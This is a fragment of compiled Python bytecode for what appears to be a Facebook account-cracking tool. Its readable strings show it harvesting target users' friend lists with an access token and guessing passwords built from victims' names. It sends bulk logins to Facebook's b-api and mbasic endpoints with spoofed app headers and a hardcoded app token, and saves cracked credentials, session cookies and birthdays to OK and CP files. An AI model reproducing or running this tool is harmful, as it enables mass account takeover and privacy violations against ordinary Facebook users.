\x1b[0;91m%s\x1b[0;97m(\x0e\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00R5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00RX\x00\x00\x00RW\x00\x00\x00RY\x00\x00\x00R4\x00\x00\x00RM\x00\x00\x00(\x04\x00\x00\x00RZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RH\x00\x00\x00\xdb\x00\x00\x00s\x1a\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x0c\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\x0e\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s"\x01\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x1b\x00\x04t\x03\x00k\n\x00r6\x00\x01\x01\x01t\x04\x00d\x03\x00\x83\x01\x00\x01n\x01\x00Xy\x16\x00t\x05\x00t\x06\x00d\x04\x00\x83\x01\x00\x83\x01\x00}\x00\x00Wn\r\x00\x01\x01\x01d\x05\x00}\x00\x00n\x01\x00Xx\xaf\x00t\x07\x00|\x00\x00\x83\x01\x00D]\xa1\x00}\x01\x00|\x01\x00d\x05\x007}\x01\x00t\x08\x00d\x06\x00|\x01\x00\x16\x83\x01\x00}\x02\x00yh\x00xa\x00t\t\x00j\n\x00d\x07\x00|\x02\x00t\x02\x00f\x02\x00\x16\x83\x01\x00j\x0b\x00\x83\x00\x00d\x08\x00\x19D]<\x00}\x03\x00|\x03\x00d\t\x00\x19}\x04\x00t\x0c\x00d\n\x00\x19j\r\x00d\x0b\x00\x83\x01\x00d\x0c\x00\x19}\x05\x00t\x0e\x00j\x0f\x00|\x04\x00d\r\x00\x17|\x05\x00\x17\x83\x01\x00\x01q\xb1\x00WWqj\x00\x04t\x10\x00k\n\x00r\n\x01\x01\x01\x01d\x0e\x00GHqj\x00Xqj\x00Wd\x0f\x00t\x11\x00t\x0e\x00\x83\x01\x00\x16GHd\x00\x00S(\x10\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s$\x00\x00\x00\x1b[1;96m[\x1b[1;94m+\x1b[1;96m] Token Errors1\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Enter Multiple ID Option : i\x01\x00\x00\x00s&\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Target Id %s : s5\x00\x00\x00https://graph.facebook.com/%s/friends?access_token=%sRV\x00\x00\x00RW\x00\x00\x00R+\x00\x00\x00RA\x00\x00\x00i\x00\x00\x00\x00s\x03\x00\x00\x00<=>s3\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Ids friend list Is not 
publics1\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Total id : \x1b[0;92m%s\x1b[0;96m(\x12\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00t\x03\x00\x00\x00intt\x05\x00\x00\x00inputt\x05\x00\x00\x00rangeR5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x01\x00\x00\x00nRX\x00\x00\x00RW\x00\x00\x00RY\x00\x00\x00R4\x00\x00\x00RM\x00\x00\x00(\x06\x00\x00\x00t\x0b\x00\x00\x00tanya_Totalt\x01\x00\x00\x00tRZ\x00\x00\x00R[\x00\x00\x00R\\\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RI\x00\x00\x00\xeb\x00\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x03\x01\x16\x01\x03\x00\n\x01\x13\x01\n\x01\x10\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x01\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHt\x00\x00d\x05\x00\x83\x01\x00}\x00\x00|\x00\x00d\x06\x00k\x02\x00r6\x00t\x01\x00\x83\x00\x00\x01n\t\x01|\x00\x00d\x07\x00k\x02\x00r\x8c\x00t\x00\x00d\x08\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00rd\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x05\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\xb3\x00|\x00\x00d\r\x00k\x02\x00r\xe2\x00t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\xba\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x08\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n]\x00|\x00\x00d\x0f\x00k\x02\x00r8\x01t\x00\x00d\x10\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\x10\x01t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\t\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\x07\x00t\x01\x00\x83\x00\x00\x01d\x00\x00S(\x11\x00\x00\x00NsM\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Choose crack methode [ \x1b[1;92mRecommended B-API 
\x1b[1;97m]sT\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mB-API\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]sV\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mM-Basic\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]s^\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mFree Facebook\x1b[1;97m [ \x1b[1;95mNormal \x1b[1;97m]s;\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m]\x1b[1;92m\xe2\x94\x80 \xc2\xae \xe2\x94\x80 \x1b[1;97mOption : R*\x00\x00\x00R=\x00\x00\x00s`\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do you choose manual passwors ? y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] : t\x01\x00\x00\x00yRA\x00\x00\x00i\x1e\x00\x00\x00s\x0b\x00\x00\x00Program EndR>\x00\x00\x00s^\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do you choose manual passwords y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] R?\x00\x00\x00sg\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4[\x1b[1;94m!\x1b[1;97m] Do you choose manual passwords y/t\x1b[1;97m [ \x1b[1;92mDefault : t \x1b[1;97m] 
(\n\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00manualR\x00\x00\x00\x00t\x03\x00\x00\x00mapt\x04\x00\x00\x00bapiRW\x00\x00\x00R1\x00\x00\x00t\x06\x00\x00\x00mbasict\x06\x00\x00\x00mobile(\x02\x00\x00\x00RG\x00\x00\x00t\x03\x00\x00\x00ask(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RG\x00\x00\x00\x00\x01\x00\x00s:\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x02c\x02\x00\x00\x00\t\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x01\x01\x00\x00y\xcf\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x02\x00t\x02\x00j\x03\x00\x83\x00\x00\x8f\xa8\x00}\x03\x00|\x03\x00j\x04\x00d\x03\x00|\x00\x00|\x02\x00f\x02\x00\x16\x83\x01\x00j\x05\x00\x83\x00\x00d\x04\x00\x19}\x04\x00|\x04\x00j\x06\x00d\x05\x00\x83\x01\x00\\\x03\x00}\x05\x00}\x06\x00}\x07\x00t\x07\x00|\x05\x00\x19}\x05\x00d\x06\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16GHt\x08\x00j\t\x00d\x07\x00|\x00\x00|\x01\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d\x08\x00t\n\x00\x16d\t\x00\x83\x02\x00j\x0b\x00d\n\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16\x83\x01\x00\x01Wd\x00\x00QXWn+\x00\x04t\x0c\x00k\n\x00r\xf6\x00\x01}\x08\x00\x01d\x0b\x00}\x06\x00d\x0b\x00}\x05\x00d\x0b\x00}\x07\x00n\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s-\x00\x00\x00https://graph.facebook.com/%s?access_token=%st\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/s+\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s|%s %s %s\x1b[0;96ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00CP/%s.txtt\x01\x00\x00\x00as\x12\x00\x00\x00 + %s|%s|%s %s 
%s\nRA\x00\x00\x00(\r\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R-\x00\x00\x00t\x07\x00\x00\x00SessionR.\x00\x00\x00R6\x00\x00\x00t\x05\x00\x00\x00splitt\t\x00\x00\x00bulan_ttlt\x02\x00\x00\x00cpRY\x00\x00\x00t\x07\x00\x00\x00tanggalR\x12\x00\x00\x00R4\x00\x00\x00(\t\x00\x00\x00R\\\x00\x00\x00t\x02\x00\x00\x00pwR9\x00\x00\x00t\x03\x00\x00\x00sest\x03\x00\x00\x00ttlt\x05\x00\x00\x00montht\x03\x00\x00\x00dayt\x04\x00\x00\x00yearR:\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00cek_ttl_cp \x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x15\x01\x0f\x01#\x01\x18\x01\n\x01\x18\x01\x17\x017\x01\x0f\x01\x06\x01\x06\x01\t\x01\x03\x00c\x01\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s\x0e\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x07\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x08\x00k\x05\x00r\xc6\x00|\x03\x00|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x04\x00}\x04\x00n{\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\xf6\x00|\x03\x00d\r\x00\x17|\x03\x00d\x0e\x00\x17|\x03\x00d\x0f\x00\x17g\x03\x00}\x04\x00nK\x00t\x07\x00|\x03\x00\x83\x01\x00d\x10\x00k\x01\x00r&\x01|\x03\x00d\x11\x00\x17|\x03\x00d\n\x00\x17|\x03\x00d\x0b\x00\x17g\x03\x00}\x04\x00n\x1b\x00|\x03\x00d\x0b\x00\x17|\x03\x00d\x0e\x00\x17|\x03\x00d\x0f\x00\x17g\x03\x00}\x04\x00y\xbf\x01x\xae\x01|\x04\x00D]\xa6\x01}\x05\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x06\x00i\x08\x00t\x10\x00t\x11\x00j\x12\x00d\x12\x00d\x13\x00\x83\x02\x00\x83\x01\x00d\x14\x006t\x10\x00t\x11\x00j\x12\x00d\x15\x00d\x16\x00\x83\x02\x00
\x83\x01\x00d\x17\x006t\x10\x00t\x11\x00j\x12\x00d\x15\x00d\x16\x00\x83\x02\x00\x83\x01\x00d\x18\x006d\x19\x00d\x1a\x006d\x1b\x00d\x1c\x006|\x01\x00d\x1d\x006d\x1e\x00d\x1f\x006d \x00d!\x006}\x07\x00|\x06\x00j\x13\x00d"\x00t\x10\x00|\x02\x00\x83\x01\x00\x17d#\x00\x17t\x10\x00|\x05\x00\x83\x01\x00\x17d$\x00\x17d%\x00|\x07\x00\x83\x01\x01}\x08\x00d&\x00|\x08\x00j\x14\x00k\x06\x00r\x8a\x02d\'\x00|\x08\x00j\x14\x00k\x06\x00r\x8a\x02d(\x00|\x02\x00|\x05\x00|\x08\x00j\x15\x00\x83\x00\x00d)\x00\x19f\x03\x00\x16GHt\t\x00j\x16\x00d*\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d+\x00t\x17\x00\x16d,\x00\x83\x02\x00j\x05\x00d-\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01PqK\x01qK\x01d.\x00|\x08\x00j\x15\x00\x83\x00\x00d/\x00\x19k\x06\x00rK\x01d0\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x16\x00d*\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d1\x00t\x17\x00\x16d,\x00\x83\x02\x00j\x05\x00d-\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01PqK\x01qK\x01qK\x01Wt\x06\x00d2\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(3\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcc\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s|\x00\x00\x00NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] 
s\x03\x00\x00\x00<=>i\x06\x00\x00\x00R=\x00\x00\x00R$\x00\x00\x00t\x03\x00\x00\x00123i\x02\x00\x00\x00R?\x00\x00\x00t\x04\x00\x00\x001234t\x05\x00\x00\x0012345i\x03\x00\x00\x00R>\x00\x00\x00g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|As\x19\x00\x00\x00x-fb-connection-bandwidthi N\x00\x00i@\x9c\x00\x00s\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines?\x00\x00\x00https://b-api.facebook.com/method/auth.login?format=json&email=s\n\x00\x00\x00&password=s\xae\x01\x00\x00&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=truet\x07\x00\x00\x00headerst\x0b\x00\x00\x00session_keyt\x04\x00\x00\x00EAAAs%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;97mt\x0c\x00\x00\x00access_tokens\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m 
s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x18\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00t\x04\x00\x00\x00loopRM\x00\x00\x00RW\x00\x00\x00t\x02\x00\x00\x00okRp\x00\x00\x00R\x13\x00\x00\x00Rn\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rm\x00\x00\x00t\x03\x00\x00\x00strt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintR.\x00\x00\x00t\x04\x00\x00\x00textR6\x00\x00\x00RY\x00\x00\x00t\x07\x00\x00\x00tBilall(\t\x00\x00\x00t\x04\x00\x00\x00usert\x02\x00\x00\x00uaR\\\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00pwxRr\x00\x00\x00Rs\x00\x00\x00t\x08\x00\x00\x00headers_t\x04\x00\x00\x00send(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rf\x00\x00\x000\x01\x00\x00sL\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x1e\x02\x1b\x01\x03\x01\r\x01\x0c\x01\x0c\x01t\x011\x01\x1e\x01\x1c\x01\x17\x01$\x01\x01\x01\x06\x01\x16\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\xfb\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn\x1d\x00\x04t\x02\x00k\n\x00r8\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x05\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x06\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x07\x00k\x05\x00r\xc0\x00|\x03\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x04\x00}\x04\x00nm\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0b\x00k\x01\x00r\xf0\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\x19\x01|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00n\x14\x00|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00
\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\x15\x006d\x16\x00d\x17\x006d\x18\x00d\x19\x006d\x1a\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006\x83\x01\x00\x01|\x07\x00j\x12\x00d \x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d!\x00\x83\x02\x00}\t\x00d"\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00g\x07\x00}\n\x00xc\x00|\t\x00d)\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x00|\n\x00k\x06\x00rA\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\xfa\x01Wq\xfa\x01\x01\x01\x01q\xfa\x01Xq\xfa\x01W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d,\x006|\x05\x00d-\x006d.\x00d/\x006d.\x00d0\x006d.\x00d1\x006d.\x00d2\x006d.\x00d3\x006d4\x00d5\x006d4\x00d6\x006d4\x00d7\x006d8\x00d9\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d:\x00d;\x00|\x06\x00\x83\x01\x01}\x0c\x00d<\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rr\x03d=\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d>\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xf9\x02\x83\x01\x00}\x0f\x00d?\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dA\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01dD\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r7\x01dE\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dF\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01q7\x01Wt\x06\x00dG\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(H\x00\x
00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\xec\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;], Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]s\\\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;95m %s/%s \xe2\x80\xa2\xe2\x80\xa2> [OK:-%s] \xc2\xae \x1b[0;95m[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Ry\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.comt\x06\x00\x00\x00origins#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, 
deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8t\x06\x00\x00\x00accepts\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comt\x04\x00\x00\x00Hosts:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8t\x07\x00\x00\x00referers\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parsert\x03\x00\x00\x00lsdt\x07\x00\x00\x00jazoestt\x04\x00\x00\x00m_tst\x02\x00\x00\x00lit\n\x00\x00\x00try_numbert\x12\x00\x00\x00unrecognized_triesR<\x00\x00\x00R^\x00\x00\x00R+\x00\x00\x00t\x05\x00\x00\x00valuet\x05\x00\x00\x00emailt\x04\x00\x00\x00passR*\x00\x00\x00t\x15\x00\x00\x00prefill_contact_pointt\x0e\x00\x00\x00prefill_sourcet\x0c\x00\x00\x00prefill_typet\x14\x00\x00\x00first_prefill_sourcet\x12\x00\x00\x00first_prefill_typet\x05\x00\x00\x00falset\x10\x00\x00\x00had_cp_prefilledt\x16\x00\x00\x00had_password_prefilledt\r\x00\x00\x00is_smart_lockt\x04\x00\x00\x00truet\x0c\x00\x00\x00_fb_noscriptsy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RV\x00\x00\x00t\x06\x00\x00\x00c_usert\x01\x00\x00\x00;s\x05\x00\x00\x00%s=%ss%\x00\x00\x00\r\x1b[0;92m[RAKA_AMANDA] %s|%s|%s\x1b[0;95ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRl\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nt\n\x00\x00\x00checkpoints*\x00\x00\x00\r\x1b[0;96m[RAKA_AMANDA] %s|%s\x1b[0;96m 
